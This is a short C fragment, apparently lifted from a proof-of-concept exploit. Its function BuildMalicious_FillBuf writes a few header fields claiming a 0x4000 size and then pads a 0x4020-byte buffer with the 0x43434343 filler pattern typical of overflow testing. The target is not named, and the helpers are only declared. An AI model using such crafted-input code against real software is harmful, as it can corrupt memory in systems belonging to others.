
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int UINT ;
typedef int BYTE ;


 scalar_t__ BufRemaining () ;
 int WriteDword (int) ;
 int WriteWord (int) ;

BYTE *BuildMalicious_FillBuf()
{
 static BYTE buf[0x4020] = {0};
 UINT offs = 0;

 WriteWord(0x52);
 WriteWord(0);

 WriteDword(0);
 WriteDword(0x4000);

 while(BufRemaining())
  WriteDword(0x43434343);

 return buf;
}
